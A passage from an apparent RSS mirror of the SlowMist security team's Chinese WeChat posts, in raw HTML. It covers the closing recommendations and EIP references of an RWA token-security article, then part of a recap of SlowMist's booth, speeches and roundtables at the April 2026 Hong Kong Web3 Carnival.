normal;">为了进一步提升安全防御的深度与效率，慢雾安全团队建议采取人机协同与动静结合的全方位防护体系：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">AI 驱动的深度辅助： 在审计阶段，集成 MistAgent AI 审计工具。利用团队沉淀自海量实战案例的漏洞知识库，AI 可以快速识别复杂的逻辑漏洞与 RWA 特有的合规性漏洞模式，辅助审计人员在海量代码中精准定位风险点。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">全天候的情报与监控： 鉴于 RWA 项目与外部环境（如预言机、链下合规网关）的强耦合性，静态审计并非终点。建议项目方在主网部署后，接入 MistEye 安全监控与威胁情报平台。通过 MistEye 提供的毫秒级链上监控与威胁预警能力，项目方可以实时捕捉异常的权限变动、大额资产流转或预言机异常，作为静态审计的必要补充，实现从“事前审计”到“事中监控”的无缝衔接。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 的本质是信任</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">的数字化。通过严谨的审计清单、前沿的 AI 辅助工具以及持续的情报监测，我们才能真正为现实资产的链上化进程构建起稳固的安全基石。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: bold;">参考链接：</span></span><span style="white-space:pre-wrap;font-size:11pt;font-family:Arial,sans-serif;color:#434343;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[1] <a href="https://github.com/Consensys/UniversalToken" target="_blank">https://github.com/Consensys/UniversalToken</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[2] <a href="https://github.com/ERC-3643/ERC-3643" target="_blank">https://github.com/ERC-3643/ERC-3643</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[3] <a href="https://eips.ethereum.org/EIPS/eip-3643" target="_blank">https://eips.ethereum.org/EIPS/eip-3643</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[4] <a href="https://eips.ethereum.org/EIPS/eip-7518" target="_blank">https://eips.ethereum.org/EIPS/eip-7518</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[5] <a href="https://eips.ethereum.org/EIPS/eip-6065" target="_blank">https://eips.ethereum.org/EIPS/eip-6065</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[6] <a href="https://eips.ethereum.org/EIPS/eip-4519" target="_blank">https://eips.ethereum.org/EIPS/eip-4519</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[7] <a href="https://eips.ethereum.org/EIPS/eip-7765" target="_blank">https://eips.ethereum.org/EIPS/eip-7765</a></span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">[8] <a href="https://eips.ethereum.org/EIPS/eip-7943" target="_blank">https://eips.ethereum.org/EIPS/eip-7943</a></span></span></p></b></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://github.com/slowmist/RWA-Security-Practices">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=17252f39&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504861%26idx%3D1%26sn%3D0f71a6b7fafe17ee9cd5e6cf07b83e41">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Apr 2026 10:52:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾 2026 香港 Web3 嘉年华之旅圆满收官!</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504841&amp;idx=1&amp;sn=289fc7c20f2f00f8313ea5a5c378f90f</link>
      <description>感谢每一位到场交流的嘉宾与朋友，期待下次再聚香港！</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-04-27 16:25</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d7429f27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJMibNPaIq31yC19x33Uda0pgywrY38ibhFOOp6Rl9bp7FGiauqXxODPPoFQGLoVtttHIWhicAbVlibGjnrWVvLoe0f8EH0AmXvcCxQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>感谢每一位到场交流的嘉宾与朋友，期待下次再聚香港！</p>
  <p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 23 日，由万向区块链实验室与 HashKey Group 联合主办、W3ME 承办的 2026 香港 Web3 嘉年华在香港会议展览中心圆满落下帷幕。作为亚洲最具影响力的 Web3 行业盛会之一，本届嘉年华以“山、风、云、海”为四大主题，汇聚了来自全球的行业领袖、开发者、投资机构及 Web3 从业者，共同探讨 AI、RWA、传统金融与加密世界融合等前沿议题。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作为一级赞助商，慢雾(SlowMist) 深度参与了本次嘉年华。在 F07 展位与全球从业者高频交流的同时，还通过主会场论坛、安全活动 Hacking Time 及多场圆桌讨论，围绕 “AI × Web3 安全”输出专业洞见。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">展位互动：面对面交流 AI &amp; Web3 安全前沿</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在主会场 F07 展位，慢雾安全团队连续四天热情迎接全球 Web3 从业者。现场不仅展示了慢雾(SlowMist) 在 AI 安全、威胁情报与链上风控领域的最新实践，还设置了互动抽奖环节。许多参与者通过与我们面对面交流，深入了解了 AI 时代下 Web3 面临的新型攻击面与防御策略，并带走了慢雾定制 T 恤、黑手册、笔记本、帆布袋及贴纸等纪念周边。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021138" data-ratio="0.75" width="529" data-type="jpeg" data-w="1520" height="395" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7c229ee3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJsZABsib4FwNXj6zKh9whQ6fycPD0oXrWMEj4gICuxtl7qzHD5VN8TjXPBIG9S1JWahITDKKpojzrDwnbDlkCbGRYOfqQjkgA4%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">除了现场高频互动外，慢雾(SlowMist) 展位也迎来了多位行业嘉宾与生态合作伙伴到访交流。大家围绕 AI 安全趋势、Web3 风险治理及行业未来发展方向展开探讨，并留下了珍贵合影。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span style="margin-left: 0px;margin-top: 0px;" data-remoteid="" data-asynid="" src="https://mmbiz.qpic.cn/mmbiz_jpg/8z8bibAexaCLjZE5ZeGrO8QQtOo7iaO8nGzTQ58VobpRS7slaAtL8fdUt9bYKM8rDgHRtn79V1q8NYv7x67IdX85hNWxsqskxlKDY8k0lCX9M/0?wx_fmt=jpeg&amp;from=appmsg" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="" data-s="" data-type="jpeg" data-w="" aria-label="" aria-braillelabel="" aria-description="" height="382" hspace="" ismap="" opacity="" sizes="" title="" type="" usemap="" vspace="" width="558" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="100021125" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="1" data-retry=""><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021139" data-ratio="0.75" width="536" data-type="jpeg" data-w="2048" height="402" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=ad1b38d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLia9aBF1J6vQ9OyGHct5Kl3RJJtHraDAdGZh4DMjhdGiafWPX3icVZmSKxudyttnHDEujiaQcjRaZpxic1bhkqmdL25ZeB8hOtf2n0%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021140" data-ratio="0.68408203125" width="558" data-type="jpeg" data-w="2048" height="382" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=fccf55e3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCI8LepcrxEqZHrJVIw1gaejH6JibVu0Jvz46A5hQBQzBauoWE0z4I1adEYlWDsfKZAkAYgMcyA8icWCVXzpyPnIbH2Skug5xFENk%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">大会开幕与主论坛回顾</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">开幕仪式于 4 月 20 日上午在主会场·山舞台举行。全国人大代表、全国工商联副主席、万向集团董事长兼 CEO 鲁伟鼎发表致辞，指出香港正以“数字策源地”姿态推进稳定币与资产代币化等创新探索，Web3 与 AI、具身智能的融合正在共同构建“智能经济”底座。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">香港财政司司长陈茂波在随后的开幕演讲中表示，AI Agent 的兴起标志着数字经济进入新阶段，Web3 与 AI 的结合正在重塑金融、贸易、供应链及物流等多个领域，同时也对支付结算体系与监管框架提出新要求。他强调，香港将持续推动稳定币、代币化与 AI 等创新发展，在审慎监管与创新支持之间保持平衡，建设具备国际竞争力的数字金融枢纽。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，香港财经事务及库务局、香港证监会及立法会等代表分别就 Web3 监管实践与制度建设发表见解，从政策与合规层面为行业发展提供方向参考。来自学界与国际机构的多位嘉宾亦围绕数字资产监管趋势与全球金融科技发展展开讨论，共同呈现出多维度的行业洞察。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021136" data-ratio="0.6669820245979187" width="569" data-type="jpeg" data-w="1057" height="378" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=6704d1ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJ6XN6fVNA7aVicu4mBibIKdyxJjIp6BiaB5WARUsadBQvZzzibiaOVIMMtdgwrIfBfIy6eG0ux9MBNibiagu21kZ5CfElxqBxicDRVZ24%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在会场一「风」主题舞台举办的“Web3 × AI：智能时代的价值重构”主题论坛中，慢雾合伙人 &amp; CPO Keywolf 受邀参与“AI 真的需要 Web3 吗？”圆桌讨论。与产业和技术一线嘉宾一道，从数据隐私、算力去中心化、价值确权等维度出发，探讨了 AI 与 Web3 从技术叠加走向价值共生的现实路径。Keywolf 结合慢雾的安全实践经验，分享了 AI 时代 Web3 安全面临的新挑战与应对思路，为论坛增添了务实的安全视角。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021143" data-ratio="0.66650390625" width="529" data-type="jpeg" data-w="2048" height="352" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=4c0791f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJIAOlubfkXicibsWAUATMFr3ibiafDWDNaRxoMZiarUYFt2tpvZouXUqTYKb7aKjbm4FcIiaMRgBBp05V2RlO13hSNnTcribf1ONjYia4%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p></b></b></p><p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">平行活动：输出安全与合规专业视角</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">除主会场论坛外，慢雾(SlowMist) 还积极参与了嘉年华期间的多场平行活动，进一步输出安全与合规专业视角。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 22 日，首届全球 Web4.0 大会在香港数码港 CyberArena 成功举办。本次大会由华赢集团（AlloyX Group）主办、ME Group 联合主办，以“AI + 数字资产的创新与融合”为主题，聚焦 Web4.0 时代“主动智能型网络”的发展方向，吸引了产业、学界与监管侧的多方代表，共同探讨 AI 与数字资产融合带来的新商业范式与价值流转方式。慢雾(SlowMist) 合伙人 &amp; CPO Keywolf 受邀参与圆桌讨论，围绕“安全与审计：构建 Web4.0 信任基石”主题展开交流。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021141" data-ratio="0.6657407407407407" width="602" data-type="jpeg" data-w="1080" height="400" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e45c8720&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJOdW1VbIJstpiaicNNoLTzceszCN6sYPMHiaC2WBLXRCcIYU73SzqyCHX2wRyA7eILLA9Jyc59lPo1S4F3uqI5z9XsbHYhGKYQgE%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">Keywolf 结合慢雾(SlowMist) 在 AI 